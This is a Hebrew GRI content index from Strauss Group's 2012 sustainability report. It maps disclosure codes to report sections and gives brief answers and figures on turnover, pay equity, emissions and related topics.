אינדקס GRI

קווים מנחים לדיווח בהתאם ליוזמת הדיווח הגלובלית (GRI)

 

הדוח נכתב בהתאם לקווים המנחים לדיווחי קיימות מטעם יוזמת הדיווח הגלובליתG4   (Global Reporting Initiative (GRI ברמת CORE.

 

 


גילויים ביחס לפרופיל החברה

 

סימוכין ב-GRI

תיאור

דיווח

עמוד מס'

הערות

1.1

הצהרה מטעם מקבל ההחלטות הבכיר בארגון

מלא

 

הצהרת המנכ"ל

1.2

תיאור השפעות, סיכונים והזדמנויות עיקריים

מלא

 

ראו דוח הדירקטוריון לשנת 2012; פורסם באתר בכתובת

www.strauss-group.com

2.1

שם הארגון

מלא

 

אודות שטראוס

2.2

מותגים, מוצרים ו/או שירותים עיקריים

 

אודות שטראוס

2.3

מבנה תפעולי של הארגון, כולל חטיבות מרכזיות, חברות פעילות, חברות בנות ומיזמים משותפים

מלא

 

אודות שטראוס. בנוסף, רשימה מלאה של חברות בנות פעילות ומיזמים משותפים נמצאת בדוח השנתי לשנת 2012, דוחות כספיים, עמ' 33.

2.4

מקום מושבו של מטה הארגון

מלא

 

אודות שטראוס

2.5

מספר המדינות בהן פועל הארגון, ושמות המדינות בהן מתקיימות פעילויות מרכזיות או כאלה שהן רלוונטיות באופן ספציפי לנושאי הקיימות המטופלים בדוח.

מלא

 

אודות שטראוס

2.6

מאפייני הבעלות ומבנה חוקי

מלא

 

אודות שטראוס

2.7

השווקים אותם משרת הארגון (כולל פירוט גיאוגרפי, מגזרי פעילות וסוגי לקוחות / מוטבים)

מלא

 

אודות שטראוס

2.8

גודל הארגון המדווח

מלא

 

אודות שטראוס. כל הנתונים והמכירות מוצגים בדולר ארה"ב, מחושבים לפי השער היציג נכון ל-31 בדצמבר 2012: 3.72 ₪ = 1$

2.9

שינויים מהותיים שחלו בתקופת הדיווח ביחס לגודל, למבנה או לבעלות בארגון

מלא

עמוד זה

לא היו שינויים מהותיים בגודל, במבנה או בבעלות בקבוצה מעבר לפעילות מיזוגים ורכישות שוטפת כמפורט בדוח השנתי. אולם, בשנת 2012 חטיבת מקס ברנר העבירה את סניפי השוקולד בר שלה לזכיינים.

2.10

פרסים שהתקבלו בתקופת הדיווח

מלא

מקום העבודה הטוב ביותר: ישראל

פרס Aurea לביומסה

אות הוקרה מטעם לקט ישראל

3.1

תקופת הדיווח (לדוגמה: שנת כספים / שנה קלנדרית) בגין המידע שנמסר

מלא

אודות דוח זה

3.2

תאריך הדוח האחרון העדכני ביותר (אם קיים)

מלא

אודות דוח זה

3.3

תדירות הדיווח (שנתי, דו-שנתי וכו')

מלא

אודות דוח זה

3.4

כתובת ארגונית לשאלות בעניין הדוח או תוכנו

מלא

 

3.5

תהליך הגדרת תכני הדוח

מלא

אודות דוח זה

3.6

גבולות הדוח (לדוגמה: מדינות, חטיבות, חברות בנות, מתקנים בחכירה, מיזמים משותפים, ספקים). להנחיות נוספות, ראה GRI Boundary Protocol

מלא

הערות לאיסוף נתונים

3.7

נא לציין מגבלות להיקף הדוח או גבולותיו (ראה עקרון השלמות להסבר בדבר ההיקף)

מלא

אודות דוח זה

3.8

נא לתאר את בסיס הדיווח לגבי מיזמים משותפים, חברות בנות, מתקנים בחכירה, פעילויות במיקור חוץ וישויות נוספות שעשויות להשפיע מהותית על היכולת להשוות בין תקופות ו/או בין ארגונים.

מלא

אודות דוח זה

3.9

טכניקות מדידת נתונים ובסיסי חישובים, כולל הנחות וטכניקות שבבסיס ההערות שהוחלו על עריכה ואיסוף האינדיקטורים או מידע אחר בדוח. נא להסביר כל החלטות שלא להחיל, או לסטות באופן מהותי מהפרוטוקולים לעניין אינדיקטורים מטעם .GRI

מלא

הערות לאיסוף נתונים

3.10

הסבר בדבר ההשפעה של הצגה מחדש של מידע שנמסר בדוחות קודמים ואת הסיבות להצגה מחדש כאמור, לדוגמה: מיזוגים / רכישות, שינוי בשנות / תקופות הבסיס, מהות העסקים, שיטות מדידה)

מלא

אין נתונים שהוצגו מחדש.

3.11

שינויים מהותיים לעומת תקופות קודמות בהיקף, במסגרת או בשיטות המדידה שיושמו בדוח.

מלא

אין שינויים מהותיים בהיקף, במסגרת או בשיטות המדידה.

3.12

טבלה המפרטת את מיקום הגילויים הסטנדרטיים בדוח זה.

מלא

אינדקס GRI

3.13

מדיניות ופרקטיקה נוכחית לעניין אישור חיצוני לדוח

מלא

אודות דוח זה

4.1

מבנה הממשל בארגון, כולל ועדות הפועלות תחת גוף הממשל הגבוה ביותר האחראי למשימות ספציפיות כגון קביעת אסטרטגיה או פיקוח ארגוני.

מלא

פרק ממשל תאגידי ודוח הדירקטוריון השנתי

4.2

נא לציין אם יו"ר גוף הממשל הגבוה ביותר משמש גם מנהל בכיר בארגון.

מלא

פרק ממשל תאגידי

4.3

עבור ארגונים עם מבנה של דירקטוריון, נא לציין את מספר החברים בגוף הממשל הגבוה ביותר, שהם חברים עצמאיים ו/או חברים ללא תפקידי ניהול בארגון.

מלא

פרק ממשל תאגידי ודוח הדירקטוריון השנתי

4.4

מנגנונים קיימים באמצעותם בעלי מניות ועובדים יכולים להעביר המלצות או הנחיות לגוף הממשל הגבוה ביותר.

מלא

פרק ממשל תאגידי

4.5

קישור בין תגמול החברים בגוף הממשל הגבוה ביותר ומנהלים בכירים (כולל הסדרי פרישה) לבין ביצועי הארגון (כולל ביצועים חברתיים וסביבתיים)

מלא

פרק ממשל תאגידי ודוח הדירקטוריון השנתי

4.6

תהליכים לשימוש על ידי גוף הממשל הגבוה ביותר להבטחת מניעת ניגודי עניינים

מלא

פרק ממשל תאגידי

4.7

תהליכים לקביעת הכישורים והמומחיות של החברים בגוף הממשל הגבוה ביותר, לשם מתן הנחיות לקביעת האסטרטגיה של הארגון בנושאים כלכליים, סביבתיים וחברתיים.

מלא

פרק ממשל תאגידי ודוח הדירקטוריון השנתי

4.8

הצהרות ייעוד או ערכים, קודי התנהגות ועקרונות שהם רלוונטיים לביצועים כלכליים, סביבתיים וחברתיים שפותחו בארגון, ומצב היישום שלהם.

מלא

חזון

4.9

נהלים בשימוש גוף הממשל הגבוה ביותר לפיקוח על זיהוי וניהול על ידי הארגון של הביצועים הכלכליים, הסביבתיים והחברתיים, כולל סיכונים והזדמנויות רלוונטיים, וקיום או ציות לסטנדרטים, קודי התנהגות ועקרונות בינלאומיים מוסכמים.

מלא

פרק ממשל תאגידי

4.10

תהליכים להערכת הביצועים של גוף הממשל הגבוה ביותר עצמו, בעיקר ביחס לביצועים כלכליים, סביבתיים וחברתיים.

מלא

פרק ממשל תאגידי

4.11

נא להסביר האם וכיצד גישת או עקרון הזהירות המונעת מטופלים על ידי הארגון.

מלא

עקרון הזהירות המונעת

4.12

אמנות, עקרונות או יוזמות כלכליות, סביבתיות וחברתיות אחרות בהם הארגון תומך, שפותחו מחוץ לארגון.

מלא

UNGC

קוד מעלה

 

4.13

חברות בארגונים (כגון ארגונים תעשייתיים) ו/או ארגוני תמיכה ארציים/בינלאומיים, שבהם הארגון: * ממלא תפקידים בגופי ממשל; * משתתף בפרויקטים או ועדות; * נותן מימון מהותי, מעבר לדמי חבר רגילים; או * רואה בחברות בהם כבעלת ערך אסטרטגי.

מלא

חברויות

4.14

רשימת קבוצות מחזיקי עניין עמם הארגון יוצר מעורבות.

מלא

יצירת מעורבות מחזיקי עניין

4.15

הבסיס לזיהוי ולבחירה של מחזיקי העניין עמם יש ליצור מעורבות.

מלא

יצירת מעורבות מחזיקי עניין

4.16

גישות ליצירת מעורבות מחזיקי עניין, כולל תדירות הקשר לפי סוגים וקבוצות מחזיקי עניין.

מלא

יצירת מעורבות מחזיקי עניין

4.17

נושאים מרכזיים שהועלו דרך הקשר עם מחזיקי עניין, והדרך בה הארגון הגיב לאותם נושאים וחששות מרכזיים, כולל באמצעות הדיווחים שלו.

מלא

שולחן עגול למחזיקי עניין

 


גילויים בדבר עמדות ההנהלה

 

קטגוריות והיבטים

דיווח

עמוד

הערות

כלכלה

 

 

 

 

ECDMA

ביצועים כלכליים

מלא

ההשפעה הכלכלית שלנו

השפעות כלכליות

מלא

ההשפעה הכלכלית שלנו

נוכחות שוק

מלא

פרופיל

 

סביבה

 

 

 

 

 

 

ENDMA

חומרים

מלא

צריכת חומרים

אנרגיה

מלא

ביצועים בתחום האנרגיה

מים

מלא

ביצועים בתחום המים

מגוון ביולוגי

מלא

עמוד זה

מעבר לניהול השפעותינו על הסביבה במסגרת פעולות הניהול הכוללות שלנו, אין לנו אסטרטגיה ספציפית לניהול השפעות על המגוון הביולוגי, היות שלאף אחת מהפעילויות שלנו אין השפעה מהותית על המגוון הביולוגי

פליטות, קולחין ופסולת

מלא

פליטות וקולחין, פסולת

מוצרים ושירותים

מלא

אחריות סביבתית

ציות

מלא

תשתיות ציות

תעבורה

מלא

תעבורה

סה"כ

מלא

השקעה סביבתית

 

התנהלות תעסוקתית

 

LADMA

תעסוקה

מלא

השקעה בעובדים שלנו

יחסי עבודה/הנהלה

מלא

אינטראקציה עם העובדים

בטיחות ובריאות תעסוקתית

מלא

מדיניות בטיחות

הדרכה וחינוך

מלא

הדרכה וחינוך

גיוון ושוויון הזדמנויות

מלא

גיוון והכלה

3.1

שכר שווה לנשים ולגברים

מלא

שכר שווה

HRDMA

זכויות אדם

 

אופני פעולה ברכש

מלא

יחסים שיתופיים עם ספקים

אי-אפליה

מלא

ציות לחוק

חופש ההתארגנות ומיקוח קולקטיבי

מלא

ציות לחוק

איסור עבודת ילדים

מלא

ציות לחוק

מניעת עבודת כפייה

מלא

ציות לחוק

תלונות ונהלים לגשת תלונות

מלא

מדיניות דלת פתוחה

נהלי אבטחה

מלא

נהלי אבטחה

זכויות ילידיות

מלא

עמוד זה

לאף אחת מהפעילויות שלנו אין השפעה על עמים ילידיים, ולא היו מקרים של הפרת זכויות בתוך קבוצת שטראוס.

 

הערכה

מלא

ממשל תאגידי

 

תיקון

מלא

ממשל תאגידי

SODMA

חברה

קהילה

מלא

השקעה בקהילה

שחיתות

מלא

התנהגות אתית

מזון בריא ובמחיר סביר

מלא

המזון הוא במרכז

מדיניות ציבורית

מלא

עמוד זה

אין אנו תומכים במפלגות פוליטיות ואיננו עוסקים בשתדלנות ישירה. עמדותינו בעניין מדיניות ציבורית מוצגות בפני האיגודים המסחריים בהם אנו חברים.

התנהגות אנטי-תחרותית

מלא

עמוד זה

שטראוס מונעת התנהגות אנטי-תחרותית על ידי יישום אופני פעולה אתיים בכל העסקים שלה.

ציות

מלא

תשתיות ציות

 

אחריות למוצרים

 

PRDMA

בריאות ובטיחות לקוחות

מלא

המזון הוא במרכז

סימון מוצרים ושירותים

מלא

עמוד זה

אנו מקיימים את כל דרישות החוק ביחס לסימון רכיבים וסימון תזונתי על כל המוצרים שלנו, ללא יוצא מן הכלל.

תקשורת שיווקית

מלא

עמוד זה

אנו מקיימים את כל החוקים, הסטנדרטים ואימצנו קודים וולונטריים כנדרש, ביחס לשיווק וקידום מכירות.

פרטיות הלקוח

מלא

אנו מקיימים את כל החוקים, הסטנדרטים ואימצנו קודים וולונטריים כנדרש, ביחס לפרטיות הלקוח.

ציות

מלא

אנו מצייתים לכל החוקים וכן לסטנדרטים פנימיים וחיצוניים ביחס למוצרים, לשיווק ולסימון.

 

שרשרת האספקה

SCDMA

הגנה על משאבים טבעיים

מלא

הגנה על משאבים טבעיים

מזעור רעילות

מלא

עמוד זה

אנו שואפים להפחית פליטות, קולחין ושפכים בכל פעילויותינו להשפעה מזערית על האוויר, הקרקע והמים.

סחר הוגן

מלא

UTZ Certified, ארגוןC4

שכר עבודה הוגן

מלא

שכר הוגן

עקיבות

מלא

המזון הוא במרכז

אורגניזמים מהונדסים גנטית (GMO)

מלא

אנו עובדים עם המגדלים שלנו כדי להטמיע דרכי פעולה אחראיות בכל הקשור לפעילות החקלאית שלנו. איננו מפקחים ספציפית על השימוש באורגניזמים מהונדסים גנטית.

רווחת בעלי חיים

מלא

עמוד זה

אין אנו מגדלים בעלי חיים

דלקים ביולוגיים

מלא

דלקים ביולוגיים

 

רווחת בעלי חיים

 

AWDMA

גידול וגנטיקה

מלא

עמוד זה

אין אנו מגדלים בעלי חיים

 

חקלאות בעלי חיים

מלא

עמוד זה

אין אנו מגדלים בעלי חיים

 

הובלה, שינוע ושחיטה

מלא

עמוד זה

אין אנו מגדלים בעלי חיים


אינדיקטורים לביצועים –  GRI G3.1

אינדיקטור

דיווח

עמוד

הערות

FP1

ליבה

אחוז הכמות הנרכשת מספקים המקיימים את מדיניות שרשרת האספקה שלנו.

מלא

 

49.8% מספקי הייצור שלנו בישראל התחייבו לאמנת הספקים שלנו. להערכתנו, מדובר בלמעלה מ-60% מכמויות הרכש שלנו בישראל.

FP2

ליבה

אחוז הכמות הנרכשת שאומת כתואם סטנדרטים אחראים לייצור שהם מהימנים ומוכרים באופן בינלאומי, בפירוט לפי סטנדרטים.

מלא

 

6.2% מכלל רכש הקפה שלנו ב-2012 בוצעו דרך ארגון 4C, אשר מספק קפה שמיוצר באופן אחראי.

EC1

ליבה

ערך כלכלי ישיר, הנוצר ומחולק, כולל הכנסות, עלויות תפעול, תגמול עובדים, תרומות והשקעות אחרות בקהילה, רווח בלתי מחולק ותשלומים לספקי הון וממשלות.

מלא

 

ההשפעה הכלכלית שלנו

EC2

ליבה

השלכות כספיות וסיכונים והזדמנויות אחרים לפעילות הארגון כתוצאה משינויי אקלים.

מלא

 

שינויי אקלים

EC3

ליבה

כיסוי התחייבויות בגין תכנית ההטבות המוגדרת של הארגון.

מלא

 

ראה דוח הדירקטוריון לשנת 2012 בכתובת

www.strauss-group.com

EC4

ליבה

סיוע כספי מהותי שהתקבל מהממשלה.

מלא

 

לא קבלנו סיוע כספי ממשלתי מהותי ב-2012.

EC5

השוואה בין המשכורת ההתחלתית הסטנדרטית בארגון לשכר המינימום המקומי באתרי פעילות מרכזיים.

מלא

 

הטבות ותגמול

EC6

ליבה

מדיניות, נהלים ואחוז ההוצאה היחסית על ספקים מקומיים באתרי פעילות מרכזיים.

מלא

 

היכן שאפשר, אנו שואפים לתמוך בספקים מקומיים, אך אין לנו מדיניות רשמית בעניין זה ואיננו מודדים רכישות מספקים מקומיים.

EC7

ליבה

נהלים לעניין גיוס עובדים מקומיים ואחוז המנהלים הבכירים המועסקים מתוך הקהילה המקומית באתרי פעילות מרכזיים.

מלא

 

מקומי זה הכי

EC8

ליבה

פיתוח והשפעת השקעות בתשתיות ושירותים המסופקים בעיקר לתועלת ציבורית דרך התקשרות מסחרית, שוות-ערך או חינם.

מלא

 

לא ביצענו כל השקעות בתשתיות לתועלת הציבור

EC9

הבנה ותיאור של השפעות כלכליות עקיפות משמעותיות, כולל מידתן של השפעות אלה.

מלא

 

ההשפעה הכלכלית שלנו

EN1

ליבה

חומרים בהם נעשה שימוש לפי משקל או נפח.

מלא

 

צריכת חומרים

EN2

ליבה

אחוז החומרים בהם נעשה שימוש, שהם  תשומות ממוחזרות.

מלא

עמוד זה

ראה להלן

תשובה ל-EN2: 100% מחומרי הגלם שלנו לייצור מזון אינם ממקורות ממוחזרים, מסיבות מובנות, וזו מרבית כמות חומרי הגלם שלנו, אם כי לא ביצענו מעקב מדויק אחר כמויות כוללות עד כה. יש לנו הזדמנות להשתמש בחומרי אריזה ממוחזרים בחלק מן האריזות שלנו, ואכן חלק מחומרי הפלסטיק והנייר או הקרטון הם ממקורות ממוחזרים. בשטראוס מים, השתמשנו בשנת 2012 ב 176 טון נייר וקרטון ממוחזרים לאחר צריכה. נשקיע מאמצים לקיים מעקב בנושא זה בשנים הבאות ולדווח באופן מלא בהמשך.

אינדיקטור

דיווח

עמוד

הערות

EN3

ליבה

צריכת אנרגיה ישירה לפי מקורות אנרגיה עיקריים.

מלא

 

אנרגיה ישירה

EN4

ליבה

צריכה אנרגיה עקיפה לפי מקורות עיקריים.

מלא

 

אנרגיה עקיפה

EN5

חיסכון באנרגיה כתוצאה משימור והתייעלות.

מלא

 

ביצועים בתחום האנרגיה

 

EN6

יוזמות לאספקת מוצרים ושירותים המבוססים על יעילות בצריכת אנרגיה או אנרגיה מתחדשת, והפחתה בצרכי האנרגיה כתוצאה מיוזמות אלה.

מלא

 

ביצועים בתחום האנרגיה

EN7

יוזמות לצמצום צריכת אנרגיה ישירה וההפחתות שהושגו.

מלא

 

יוזמות להפחתת צריכת האנרגיה

EN8

ליבה

שאיבת מים כוללת לפי מקורות.

מלא

 

צריכת מים כוללת

EN9

מקורות מים המושפעים מהותית עקב שאיבת מים.

מלא

עמוד זה

כמעט כל צריכת המים שלנו מקורה במערכות המים הארציות, ועל כן אין לה השפעה על מקורות מים אחרים בכל צורה שהיא.

EN10

אחוז ונפח כולל של מים ממוחזרים ומים שנעשה בהם שימוש חוזר.

חלקי

צריכת מים כוללת

EN11

ליבה

מיקום וגודל קרקעות בבעלות, בחכירה, המנוהלים בתוך או בסמוך לאזורים מוגנים ואזורים בעלי ערך רב מבחינת המגוון הביולוגי, מחוץ לאזורים מוגנים.

מלא

אין לנו קרקעות באזורים בעלי ערך רב מבחינת המגוון הביולוגי. כל האתרים שלנו מצויים באזורים עירוניים.

EN12

ליבה

תיאור השפעות מהותיות של פעילויות, מוצרים ושירותים על המגוון הביולוגי באזורים מוגנים ובאזור בעלי ערך רב מבחינת המגוון הביולוגי, מחוץ לאזורים מוגנים.

מלא

עמוד זה

אין אנו יוצרים השפעות מהותיות באזורים בעלי ערך רב מבחינת המגוון הביולוגי. כל האתרים שלנו מצויים באזורים עירוניים.

EN13

סביבות מגורים טבעיות מוגנות או משוקמות.

מלא

עמוד זה

אין אנו עוסקים בהגנה על סביבות מגורים טבעיות או בשיקומן. לפעילות שלנו אין השפעות שליליות בתחום זה.

EN14

אסטרטגיות, פעולות נוכחיות ותכניות עתידיות לניהול ההשפעות על המגוון הביולוגי.

מלא

עמוד זה

מעבר לניהול ההשפעות הסביבתיות שלנו במסגרת פעולות הניהול האחראיות הכוללות שלנו, לא פותחה אסטרטגיה ספציפית לניהול השפעות על המגוון הביולוגי משום שאין לנו השפעה מהותית בנושא זה.

EN15

מספר המינים מ"הרשימה האדומה" של ארגון ה-IUCN ומרשימות השימור הארציות בעלי סביבות מגורים טבעיות באזורים המושפעים על ידי הפעילות, לפי רמת סכנת ההכחדה.

מלא

עמוד זה

אין לנו כל השפעה בתחום זה.

EN16

ליבה

סך כל פליטות גזי חממה ישירות ועקיפות לפי משקל.

מלא

ביצועים בתחום פליטת גזי חממה

EN17

ליבה

פליטות גזי חממות עקיפות רלוונטיות אחרות לפי משקל.

מלא

פליטות ממכלול 3

EN18

יוזמות להפחתת פליטות גזי חממה והפחתות שהושגו.

מלא

ביצועים בתחום פליטת גזי חממה

EN19

ליבה

פליטות חומרים מדללי אוזון לפי משקל.

מלא

חומרים מדללי אוזון

EN20

ליבה

תחמוצת גפרית (SOX) ותחמוצת חנקן (NOx) ופליטות מהותיות נוספות לאוויר לפי סוגים ומשקל.

מלא

מזהמי אוויר ספציפיים

EN21

ליבה

כמות כוללת של מים מוזרמים לפי איכות ויעד.

חלקי

ניהול שפכים

EN22

ליבה

משקל כולל של פסולת לפי סוגים ושיטות טיפול.

מלא

ניהול פסולת

EN23

ליבה

מספר ונפח כוללים של אירועי שפיכה מהותיים.

מלא

עמוד זה

לא היו אירועי שפיכה מהותיים באף אחת מהפעילויות שלנו ב-2012.

EN24

משקל פסולת מובלת, מיובאת, מיוצאת או מטופלת, הנחשבת מסוכנת על פי תנאי אמנת באזל נספחים I, II, III ו-VIII, ואחוז הפסולת המובלת במשלוחים בינלאומיים.

מלא

פסולת מסוכנת

EN25

זהות, גודל, מעמד מוגן וערך מבחינת המגוון הביולוגי של גופי מים וסביבות מגורים טבעיות קשורות, שהם מושפעים באופן מהותי על ידי הזרמות המים והתשטיפים של הארגון המדווח.

מלא

עמוד זה

הזרמות המים שלנו אינן משפיעות על המגוון הביולוגי של גופי מים וסביבות מגורים טבעיות.

EN26

ליבה

יוזמות לצמצום ההשפעות הסביבתיות של מוצרים ושירותים, ומידת צמצום ההשפעות.

מלא

  • בקבוקי PET של יטבתה
  • שיפורים בטיהור שפכים

EN27

ליבה

אחוז המוצרים הנמכרים וחומרי האריזה שלהם שהם מושבים, לפי קטגוריות.

מלא

עמוד זה

ראה להלן.

תשובה ל-EN27: אף אחד ממוצרי המזון שלנו בעולם אינו עובר תהליך מחזור לאחר הצריכה. אנו מתחילים ליישם החזרה ואיסוף של  חומרי אריזה במדינות שונות, וברומניה, סרביה ופולין השבנו ב-2012 2.3 טון פסולת אריזה לאחר צריכה למיחזור. בישראל, הפסולת נאספת על ידי ספק שירות ארצי (תאגיד המיחזור), אשר מפרסם תוצאות של השבת חומרי אריזה למדינה כולה. ב-2012 פרסם תאגיד האריזות הארצי רמות מיחזור של 62% פסולת כללית. אנו מאמינים שהדברים מתייחסים גם לקבוצת שטראוס בישראל, אם כי אין לנו נתונים ספציפיים יותר במועד זה.

אינדיקטור

דיווח

עמוד

הערות

EN28

ליבה

ערכם הכספי של קנסות מהותיים ומספרן הכולל של סנקציות לא כספיות בגין אי-ציות לחוקים ותקנות סביבתיים.

מלא

עמוד זה

ב-2012 קבוצת שטראוס לא שילמה כל קנסות מהותיים בגין אי-ציות לחוקים ותקנות סביבתיים.

EN29

השפעות סביבתיות מהותיות של הובלת מוצרים או טובין וחומרים אחרים המשמשים לפעילויות הארגון, ושל הסעת עובדים.

מלא

ראה להלן.

תשובה ל-EN29: במסגרת פליטות גזי החממה שלנו המדווחות תחת EN16, אנו מייצרים פליטות גזי חממה הקשורות לפעילויות התחבורה שלנו, עבורן אנו רוכשים דלקים וגזים. ב-2012, פליטות אלה הסתכמו בקרוב ל-17,463 טון CO2e.

פליטות גזי חממה כתוצאה מפעילויות תחבורה ב-2012

טון CO2e

דיזל

6,695

בנזין

9,816

אתנול

89

גז טבעי

324

סה"כ

16,924

נ.ב.: הנ"ל אינו כולל פליטות הנוצרות כתוצאה מלוגיסטיקה צד שלישי וספקי תחבורה.

אינדיקטור

דיווח

עמוד

הערות

EN30

 

סך כל הוצאות והשקעות בגין הגנה סביבתית לפי סוגים.

חלקי

השקעות סביבתיות לא מתועדות לפי סוגים

אינדיקטור

דיווח

עמוד

הערות

LA1

 ליבה

כוח העבודה הכולל לפי סוגי תעסוקה, חוזי עבודה ואזורים.

מלא

הצוות הגלובלי שלנו

LA2

ליבה

מספרים ושיעור כולל של תחלופת עובדים לפי קבוצות גיל, מין ואזורים.

מלא

ראה להלן.

אנו מחשבים את תחלופת העובדים כמספר העובדים שעזבו את הקבוצה במשך השנה, חלקי המספר הכולל של עובדים בסוף שנה קודמת.

תחלופת עובדים לפי אזורים ב-2012

נשים

גברים

סה"כ תחלופה

סה"כ תחלופה כ-% מסה"כ עובדים

תחלופת נשים – % תרומה לסה"כ תחלופה

תחלופת גברים – % תרומה לסה"כ תחלופה

אירופה

195

253

448

4

5%

6%

ארה"ב

162

190

352

3

4%

5%

ברזיל

504

1,059

1,563

13

12%

26%

ישראל

917

799

1,716

14

22%

20%

סה"כ

1,778

2,301

4,079

33

44%

56%

תחלופת עובדים לפי גיל ב-2012

30>

30-50

50<

סה"כ תחלופה

סה"כ תחלופה כ-% מסה"כ עובדים

תחלופת 30>  % תרומה לסה"כ תחלופה

30-50 % תרומה לסה"כ תחלופה

50< % תרומה לסה"כ תחלופה

אירופה

97

291

60

448

2%

2%

7%

1%

ארה"ב

333

18

1

352

8%

8%

0%

0%

ברזיל

928

613

22

1,563

23%

23%

15%

1%

ישראל

944

697

75

1,716

23%

23%

17%

2%

סה"כ

2,302

1,619

158

4,079

56%

56%

40%

4%

אינדיקטור

דיווח

עמוד

הערות

LA3

 

הטבות לעובדים במשרה מלאה, שאינן ניתנות לעובדים זמניים או לעובדים במשרה חלקית, בפעילויות מרכזיות.

מלא

הטבות ותגמול עובדים

LA4

ליבה

אחוז העובדים המכוסים על ידי הסכמי קיבוציים.

מלא

הקדמה להשקעה בעובדים שלנו

LA5

ליבה

תקופת הודעה מוקדמת מינימלית בנוגע לשינויים אופרטיביים  מרכזיים, כולל האם מצוין בהסכמים קיבוציים.

מלא

אנו מקיימים את כל תקופות ההודעה המוקדמת המינימליות כנדרש בחוק או על פי ההסכמים הקיבוציים שלנו שבתוקף, לפי המיטיב יותר עם העובדים. היכן שאפשר, אנו נותנים תקופת הודעה מוקדמת ארוכה יותר.

FP3

ליבה

אחוז זמן עבודה אבוד כתוצאה מסכסוכי עבודה, שביתות ו/או השבתות, לפי מדינות.

מלא

הקדמה להשקעה בעובדים שלנו

LA6

אחוז מסך כל כוח העבודה המיוצג בוועדות הנהלה-עובדים פורמליות לבריאות ובטיחות, אשר מסייעות בניטור וייעוץ בנוגע לתכניות בטיחות ובריאות תעסוקתית.

מלא

אין וועדות הנהלה-עובדים פורמליות לבריאות ובטיחות בקבוצה. אולם, בכל האתרים התפעוליים שלנו העובדים מעורבים בוועדות בטיחות מקומיות. אנו מעריכים שמדובר בכ-100 עובדים – קרוב ל-1% מכוח העבודה שלנו.

LA7

ליבה

שיעורי פציעה, מחלות תעסוקתיות, ימים אבודים והיעדרות, ומספר מקרי המוות הקשורים לתעסוקה, לפי אזורים.

מלא

בטיחות ובריאות

LA8

ליבה

תכניות חינוך, הדרכה, ייעוץ, מניעה ובקרת סיכונים לשם סיוע לעובדים, משפחותיהם או חברים בקהילה לעניין מחלות חמורות.

מלא

אנו מקיימים תכניות הדרכת בטיחות אשר כוללות התייחסות והדרכה בנוגע למחלות חמורות הכין שהדבר רלוונטי, במפעלים השונים שלנו. אולם, במרבית המקומות בהם אנו פועלים ועקב אופי הפעילות שלנו, מחלות חמורות אינן נושא מהותי מרכזי המהווה מקור לדאגה.

LA9

נושאי בטיחות ובריאות המכוסים בהסכמים פורמליים עם איגודים מקצועיים.

לא מדווח

LA10

ליבה

שעות הדרכה ממוצעת לעובד לשנה, לפי קטגוריות עובדים.

מלא

פיתוח עובדים

LA11

תכניות לניהול כישורים ולמידה לאורך החיים, התומכות ביכולתם של עובדים להסתגל לדרישות עבודה משתנות ולסייע להם בניהול סיום התעסוקה.

מלא

פיתוח עובדים

LA12

אחוז עובדים הזוכים להערכות קבועות של ביצועים ופיתוח קריירה.

מלא

הערכת ביצועים

LA13

ליבה

הרכב גופי ממשל ופירוט עובדים לפי קטגוריות בהתאם למין, קבוצות גיל, שייכות לקבוצות מיעוט ואינדיקציות נוספות לגיוון.

מלא

ממשל תאגידי

LA14

ליבה

היחס בין שכר הבסיס של גברים ונשים, לפי קטגוריות עובדים.

מלא

ראה להלן

המדיניות שלנו היא להציע שכר שווה לתפקידים מקבילים. באופן מעשי, בקרב עובדים שאינם מנהלים, השכר בפועל נקבע בהתאם לביצועים, וותק ונורמות שוק בכל מדינה לסוגי תפקידים שונים. בקרב עובדים שאינם מנהלים קיים מגוון רחב של תפקידים, וכל דרגת שכר נקבעת בהתאם ברמה זהה לגברים ונשים, אם כי אופי התפקידים הממולאים על ידי גברים ונשים נוטה להיות שונה. להלן טבלה המשווה בין משכורות נשים וגברים במדינות פעילות מרכזיות. ברמות ההנהלה כל התפקידים מוערכים בהתאם לאותן דרגות שכר מכוילות לפי שווקים, ומתקיימת הזדמנות לשכר שווה.

יחס שכר הבסיס בין גברים לנשים ב-2012

יחס משכורות נשים כאחוז ממשכורות גברים בתפקידים שאינם הנהלה

אירופה

88

ארה"ב

89

ברזיל

82

ישראל

78

אינדיקטור

דיווח

עמוד

הערות

LA15

ליבה

 

חזרה לעבודה ושיעורי שימור לאחר חופשת לידה, לפי מין.

מלא

ב-2012, 364 עובדים יצאו לחופשת לידה, מהם 19 (5%) היו גברים. ב-2012, 295 עובדים חזרו לעבודה לאחר חופשת לידה, מהן 19 היו גברים (6%) – שיעור שימור של 81%.

HR1

ליבה

אחוז ומספר כולל של הסכמי השקעה מהותיים אשר כוללים סעיפי זכויות אדם או אשר עברו סינון בנושא זכויות אדם.

מלא

תשתיות ציות

HR2

ליבה

אחוז ספקים וקבלנים מהותיים אשר עברו סינון בנושא זכויות אדם ופעולות שננקטו.

מלא

תשתיות ציות

HR3

ליבה

סה"כ שעות הדרכת עובדים במדיניות ונהלים הנוגעים להיבטים של זכויות אדם, שהם רלוונטיים לפעילות, כולל אחוז העובדים שעברו את ההדרכה.

לא מדווח

 

HR4

ליבה

מספר כולל של מקרי אפליה ופעולות שננקטו.

מלא

לא היו מקרי אפליה מדווחים באף אחת מפעילויות קבוצת שטראוס ב-2012.

HR5

ליבה

פעילויות שזוהו ככאלו בהן הזכות להתארגנות ולמיקוח קולקטיבי עלולה להיות בסיכון מהותי, ופעולות שננקטו לתמיכה בזכויות אלה.

מלא

הקדמה להשקעה בעובדים שלנו

HR6

ליבה

פעילויות שזוהו ככאלה שיש בהן סיכון מהותי למקרים של עבודת ילדים, ואמצעים שננקטו כדי לתרום לחיסול עבודת ילדים.

מלא

הקדמה להשקעה בעובדים שלנו

HR7

ליבה

פעילויות שזוהו ככאלה שיש בהן סיכון מהותי למקרים של עבודת כפייה, ואמצעים שננקטו כדי לתרום לחיסול עבודת כפייה.

מלא

הקדמה להשקעה בעובדים שלנו

HR8

אחוז עובדי אבטחה שעברו הדרכה במדיניות או נהלי הארגון, הנוגעים להיבטי זכויות אדם שהם רלוונטיים לפעילות.

מלא

הקדמה להשקעה בעובדים שלנו

HR9

סה"כ מקרי הפרה של זכויות עמים ילידים ופעולות שננקטו.

מלא

אף אחת מהפעילויות שלנו אינה משפיעה על עמים ילידים, ולא היו מקרים של הפרת זכויות בתוך קבוצת שטראוס.

HR10

(3.1)

אחוז ומספר כולל של פעילויות שעברו בדיקה בקשר עם זכויות אדם ו/או הערכת השפעות.

מלא

הקדמה להשקעה בעובדים שלנו

HR11

(3.1)

